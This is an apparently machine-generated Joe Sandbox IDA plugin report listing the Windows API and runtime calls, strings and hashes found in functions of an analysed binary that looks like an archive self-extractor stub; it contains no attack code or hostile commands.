                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D788
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D79A
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D7AC
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D7BE
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D7D0
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D7E2
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D7F4
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D806
                                                            • _free.LIBCMT ref: 0006DB6B
                                                              • Part of subcall function 0006A4BA: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?), ref: 0006A4D0
                                                              • Part of subcall function 0006A4BA: GetLastError.KERNEL32(?,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?,?), ref: 0006A4E2
                                                            • _free.LIBCMT ref: 0006DB8D
                                                            • _free.LIBCMT ref: 0006DBA2
                                                            • _free.LIBCMT ref: 0006DBAD
                                                            • _free.LIBCMT ref: 0006DBCF
                                                            • _free.LIBCMT ref: 0006DBE2
                                                            • _free.LIBCMT ref: 0006DBF0
                                                            • _free.LIBCMT ref: 0006DBFB
                                                            • _free.LIBCMT ref: 0006DC33
                                                            • _free.LIBCMT ref: 0006DC3A
                                                            • _free.LIBCMT ref: 0006DC57
                                                            • _free.LIBCMT ref: 0006DC6F
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 0005E691
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 0005E6BD
                                                              • Part of subcall function 000532E6: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000132E6,0004D503,00000000,.exe,?,?,00000800,?,?,?,00059E2C), ref: 000532FC
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0005E6D9
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0005E6F0
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0005E704
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0005E72D
                                                            • DeleteObject.GDI32(00000000), ref: 0005E734
                                                            • GetWindow.USER32(00000000,00000002), ref: 0005E73D
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            APIs
                                                            • _free.LIBCMT ref: 0006A285
                                                              • Part of subcall function 0006A4BA: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?), ref: 0006A4D0
                                                              • Part of subcall function 0006A4BA: GetLastError.KERNEL32(?,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?,?), ref: 0006A4E2
                                                            • _free.LIBCMT ref: 0006A291
                                                            • _free.LIBCMT ref: 0006A29C
                                                            • _free.LIBCMT ref: 0006A2A7
                                                            • _free.LIBCMT ref: 0006A2B2
                                                            • _free.LIBCMT ref: 0006A2BD
                                                            • _free.LIBCMT ref: 0006A2C8
                                                            • _free.LIBCMT ref: 0006A2D3
                                                            • _free.LIBCMT ref: 0006A2DE
                                                            • _free.LIBCMT ref: 0006A2EC
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0005A6C6
                                                            • _wcslen.LIBCMT ref: 0005A766
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0005A775
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0005A796
                                                            Strings
                                                            Similarity
                                                            • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1116704506-4209811716
                                                            APIs
                                                              • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                              • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            • EndDialog.USER32(?,00000001), ref: 0005C6A0
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0005C6C7
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0005C6E0
                                                            • SetWindowTextW.USER32(?,?), ref: 0005C6F1
                                                            • GetDlgItem.USER32(?,00000065), ref: 0005C6FA
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0005C70E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0005C724
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0004B5C2
                                                              • Part of subcall function 000526D1: GetSystemTime.KERNEL32(?), ref: 000526DF
                                                              • Part of subcall function 000526D1: SystemTimeToFileTime.KERNEL32(?,?), ref: 000526ED
                                                              • Part of subcall function 0005267A: __aulldiv.LIBCMT ref: 00052683
                                                            • __aulldiv.LIBCMT ref: 0004B5EE
                                                            • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0004B5F5
                                                            • _swprintf.LIBCMT ref: 0004B620
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            • _wcslen.LIBCMT ref: 0004B62A
                                                            • _swprintf.LIBCMT ref: 0004B680
                                                            • _wcslen.LIBCMT ref: 0004B68A
                                                            Strings
                                                            Similarity
                                                            • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
                                                            • String ID: %u.%03u
                                                            • API String ID: 2956649372-1114938957
                                                            • Opcode ID: ed16d30bb734b8e5c908792b94597c5cc02572fe1b1f98b2f91c856d55d1c99e
                                                            • Instruction ID: f8dab463d0aac03997a8c95e02e9ce4041307580099514d67f4716cb1fc5d696
                                                            • Opcode Fuzzy Hash: ed16d30bb734b8e5c908792b94597c5cc02572fe1b1f98b2f91c856d55d1c99e
                                                            • Instruction Fuzzy Hash: 2F217FB2A043006BD724EF64DC85DAB77DCEB94310F45492AB549D3242DA34DA0887A6
                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC0F
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0005BC20
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 0005BC2E
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC3C
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0005BC57
                                                            • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0005BC7E
                                                            • _swprintf.LIBCMT ref: 0005BCA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
                                                            • String ID: %s %s
                                                            • API String ID: 385609497-2939940506
                                                            • Opcode ID: 3aa6bd0d4000d6267547bd12b9a097234b91f55dc766270ac3614867e0673384
                                                            • Instruction ID: 797bcf52fbcce1aeb63343e9a27054cb828ff10de6b6bb3ba920b046481d90c9
                                                            • Opcode Fuzzy Hash: 3aa6bd0d4000d6267547bd12b9a097234b91f55dc766270ac3614867e0673384
                                                            • Instruction Fuzzy Hash: 2621DEB294115CABDB11DFA0EC44EEF3BACFF15304F440026FA09D2111E724DA89CB61
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,0004C41F,0004C421,00000000,00000000,4BF7CAE1,00000001,00000000,00000000,0004C30C,?,?,?,0004C41F,ROOT\CIMV2), ref: 00060DA9
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,0004C41F,?,00000000,00000000,?,?,?,?,?,0004C41F), ref: 00060E24
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00060E2F
                                                            • _com_issue_error.COMSUPP ref: 00060E58
                                                            • _com_issue_error.COMSUPP ref: 00060E62
                                                            • GetLastError.KERNEL32(80070057,4BF7CAE1,00000001,00000000,00000000,0004C30C,?,?,?,0004C41F,ROOT\CIMV2), ref: 00060E67
                                                            • _com_issue_error.COMSUPP ref: 00060E7A
                                                            • GetLastError.KERNEL32(00000000,?,0004C41F,ROOT\CIMV2), ref: 00060E90
                                                            • _com_issue_error.COMSUPP ref: 00060EA3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            • Opcode ID: c3a37dde6ac50e42981c41e528b587d747d89f579b8f4ae00853b087de20e381
                                                            • Instruction ID: e0745ea354dc7ad283407e70a1e1760e68ea4eaa014175c92b8f15018b89a8d5
                                                            • Opcode Fuzzy Hash: c3a37dde6ac50e42981c41e528b587d747d89f579b8f4ae00853b087de20e381
                                                            • Instruction Fuzzy Hash: 9C410671A40214EBD7109FA8DC45BAFBBEAEB48750F108629F509E7241D73AA840CBA5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            • Opcode ID: 436e9b4874017762913ee9e49dca0edf6ccff1e10025ee2ad6d3cfaeee33d8fe
                                                            • Instruction ID: d7d2a6ecc225a0837e41cad427764f0976b8847c17ce585e0963f8149681401a
                                                            • Opcode Fuzzy Hash: 436e9b4874017762913ee9e49dca0edf6ccff1e10025ee2ad6d3cfaeee33d8fe
                                                            • Instruction Fuzzy Hash: DF716C71A01619AFEB54DFA4CC94DBEB7B9FF88310B104169E506E72A1CB34AD42CB64
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0004A5CC
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0004A5EF
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0004A60E
                                                              • Part of subcall function 0004D687: _wcslen.LIBCMT ref: 0004D68F
                                                              • Part of subcall function 000532E6: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000132E6,0004D503,00000000,.exe,?,?,00000800,?,?,?,00059E2C), ref: 000532FC
                                                            • _swprintf.LIBCMT ref: 0004A6AA
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            • MoveFileW.KERNEL32(?,?), ref: 0004A719
                                                            • MoveFileW.KERNEL32(?,?), ref: 0004A759
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            • Opcode ID: 3875bffdd0ee83e845500872f71843a8d6f0870231269a411c7bc8719271fb15
                                                            • Instruction ID: 6167137ff07e165c0d89b6f05e248bf9d89a946bdb835a7e8799f1ec70e29a53
                                                            • Opcode Fuzzy Hash: 3875bffdd0ee83e845500872f71843a8d6f0870231269a411c7bc8719271fb15
                                                            • Instruction Fuzzy Hash: 214164B1A4025966DF30EBA0CC49EEF73BCAF56381F0504B9B545E3042DB389A85DF69
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 0005251E
                                                              • Part of subcall function 0004C5F9: GetVersionExW.KERNEL32(?), ref: 0004C61E
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00052541
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00052553
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00052564
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052574
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052584
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 000525BF
                                                            • __aullrem.LIBCMT ref: 00052669
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            • Opcode ID: af0e0215745beb56467cc203c2fc8cd5e1a706db61a71b79b9c4a15664cbcb2f
                                                            • Instruction ID: 4495903bf9739af70845e89bf1b8fdf75cf99bbde811799dc0bee262b36f71dc
                                                            • Opcode Fuzzy Hash: af0e0215745beb56467cc203c2fc8cd5e1a706db61a71b79b9c4a15664cbcb2f
                                                            • Instruction Fuzzy Hash: 594138B15083059FD750DF65C88496BBBF9FF88315F40892EF99AD2210E738E589CB62
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: 63eb1b2dca3e0129fa8429264c797ed65c6c397f06496f80f8cef307bdbd88a7
                                                            • Instruction ID: 006cbda645e1a3f6585073309fc31a4427d92853603d5d2cb4b278aad59d5d37
                                                            • Opcode Fuzzy Hash: 63eb1b2dca3e0129fa8429264c797ed65c6c397f06496f80f8cef307bdbd88a7
                                                            • Instruction Fuzzy Hash: A351482674032395DB746A145C127B773F0DFA2793F58462AFDC28B6C0FBA58D488272
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00070E12,00000000,00000000,00000000,00000000,00000000,000663FD), ref: 000706DF
                                                            • __fassign.LIBCMT ref: 0007075A
                                                            • __fassign.LIBCMT ref: 00070775
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0007079B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,00070E12,00000000,?,?,?,?,?,?,?,?,?,00070E12,00000000), ref: 000707BA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,00070E12,00000000,?,?,?,?,?,?,?,?,?,00070E12,00000000), ref: 000707F3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: 6fd4768f91eb89c76a4ea8ce19512bfee5d46d7420c051d05d51a58901eb84f6
                                                            • Instruction ID: 76410cb5fdefc24639d288c503d0809dbb897fd22e27a53b5afc95ecb495a12a
                                                            • Opcode Fuzzy Hash: 6fd4768f91eb89c76a4ea8ce19512bfee5d46d7420c051d05d51a58901eb84f6
                                                            • Instruction Fuzzy Hash: 9851A270E00249DFDB10CFA8D885BEEBBF8EF49300F14825AE959E7251D7349941CBA5
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00063917
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0006391F
                                                            • _ValidateLocalCookies.LIBCMT ref: 000639A8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 000639D3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00063A28
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: 93e9a3d58a315d8cd701280a19ca927d8c0eeba846f649f9ab446cabd5ea2228
                                                            • Instruction ID: 184ab2c04fce04077b5091a48cc586e64fb679d08c99b1be3cc643341e4deb97
                                                            • Opcode Fuzzy Hash: 93e9a3d58a315d8cd701280a19ca927d8c0eeba846f649f9ab446cabd5ea2228
                                                            • Instruction Fuzzy Hash: AF41A134E00208AFCF50DF68D881AEEBBF6AF45324F148155E9199B392C7759A15CFE1
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 0005AEDE
                                                            • GetWindowRect.USER32(?,?), ref: 0005AF34
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 0005AFD1
                                                            • SetWindowTextW.USER32(?,00000000), ref: 0005AFD9
                                                            • ShowWindow.USER32(00000000,00000005), ref: 0005AFEF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            • Opcode ID: e67e88d2ee3edae468c83dd906fde2ea1708ac681c1f9e5baa8b3845ce6f37e0
                                                            • Instruction ID: 1fce14ef4757b562533ad0a4df9918faf66315744810b03013af17fd9229759d
                                                            • Opcode Fuzzy Hash: e67e88d2ee3edae468c83dd906fde2ea1708ac681c1f9e5baa8b3845ce6f37e0
                                                            • Instruction Fuzzy Hash: 3141D072244604BFEB215FA0DC48B6B7BE9FF4A702F044669FD4999062DB34D848CB62
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                            APIs
                                                              • Part of subcall function 0006D878: _free.LIBCMT ref: 0006D8A1
                                                            • _free.LIBCMT ref: 0006D902
                                                              • Part of subcall function 0006A4BA: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?), ref: 0006A4D0
                                                              • Part of subcall function 0006A4BA: GetLastError.KERNEL32(?,?,0006D8A6,?,00000000,?,00000000,?,0006D8CD,?,00000007,?,?,0006DCCA,?,?), ref: 0006A4E2
                                                            • _free.LIBCMT ref: 0006D90D
                                                            • _free.LIBCMT ref: 0006D918
                                                            • _free.LIBCMT ref: 0006D96C
                                                            • _free.LIBCMT ref: 0006D977
                                                            • _free.LIBCMT ref: 0006D982
                                                            • _free.LIBCMT ref: 0006D98D
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0005F643,0005F5A6,0005F847), ref: 0005F5DF
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0005F5F5
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0005F60A
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 000527C1
                                                              • Part of subcall function 0004C5F9: GetVersionExW.KERNEL32(?), ref: 0004C61E
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000527E5
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 000527FF
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00052812
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052822
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00052832
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00063AD1,0006388C,00060A44), ref: 00063AE8
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00063AF6
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00063B0F
                                                            • SetLastError.KERNEL32(00000000,00063AD1,0006388C,00060A44), ref: 00063B61
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            APIs
                                                            • GetLastError.KERNEL32(?,000830C4,000657D2,000830C4,?,?,0006524D,?,?,000830C4), ref: 0006A369
                                                            • _free.LIBCMT ref: 0006A39C
                                                            • _free.LIBCMT ref: 0006A3C4
                                                            • SetLastError.KERNEL32(00000000,?,000830C4), ref: 0006A3D1
                                                            • SetLastError.KERNEL32(00000000,?,000830C4), ref: 0006A3DD
                                                            • _abort.LIBCMT ref: 0006A3E3
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0005EC17
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005EC31
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005EC42
                                                            • TranslateMessage.USER32(?), ref: 0005EC4C
                                                            • DispatchMessageW.USER32(?), ref: 0005EC56
